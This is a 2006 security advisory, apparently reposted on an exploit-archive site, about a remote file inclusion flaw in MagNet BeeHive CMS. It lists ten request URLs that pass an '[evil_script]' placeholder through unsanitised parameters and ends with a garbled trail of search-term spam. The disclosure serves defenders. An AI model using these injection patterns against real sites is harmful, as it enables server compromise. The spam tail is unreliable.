about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MagNet BeeHive CMS (header) Remote File Include Vulnerability




2006-06-25 MagNet BeeHive CMS (header) Remote File Include Vulnerability
Rated as : High Risk

---------------------------------------------------------------------------
Beehive CMS ([header]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Beehive CMS
version : latest version
URL : http://products.magnet-i.com/show/beehive/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $header not sanitized.When register_globals=on an attacker can
exploit this vulnerability with a simple php injection script.


#
http://www.site.com/[path]/conad/include/rootGui.inc.php?header=[evil_script]
#
http://www.site.com/[path]/conad/changeEmail.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/conad/changeUserDetails.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/conad/checkPasswd.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/login.inc.php?mysqlCall=[evil_script]
# http://www.site.com/[path]/conad/logout.inc.php?mysqlCall=[evil_script]
#
http://www.site.com/[path]/include/listall.inc.php?mysqlcall=[evil_script]
# http://www.site.com/[path]/show/index.php?prefix=[evil_script]
#
http://www.site.com/[path]/conad/include/mysqlCall.inc.php?config=[evil_script]
# http://www.site.com/[path]/include/rootGui.inc.php?header=[evil_script]

---------------------------------------------------------------------------


Solution :
~~~~~~~~~~

declare variabel $header
---------------------------------------------------------------------------


Shoutz:
~~~~~~

# Special greetz to my good friend [Oo]
# To all members of h4cky0u.org ;) and Romanian Security Team [
hTTp://Romania.HackTECK.BE ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~~~~
Nick: Kw3rLN
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://Romania.HackTECK.BE & http://www.h4cky0u.org/
/*

-------------------------------- [ EOF]
----------------------------------


securitydot.net - 2006-06-25

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 12:44:09 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ncx99 DVD rental Www.bongos www.huncit fre virgin www.huncit ADODB 200 /compo Www.Sexygi p...php?st Rpc +++Apache% babe5 Nuked-Kla www.sxgoog wap phoner www.,iranx p...Ficon/ wedding ha Frankyrp@h nude india tricha maxpifa.cn 200 /compo Samira.Com Samira.Com Crack Data www.etaowa www.51-sf. word+press wifi+attac Enemal sex cisco 11.2 younggirls www.etaowa ...lates/ eeee www.86el.c SWETHA THI Chathurika 0721.com MovieList sakilasex simpel mic dagsexwman &# speak team maxcpm.inf %5C%5C%5C% MySQL 4.1.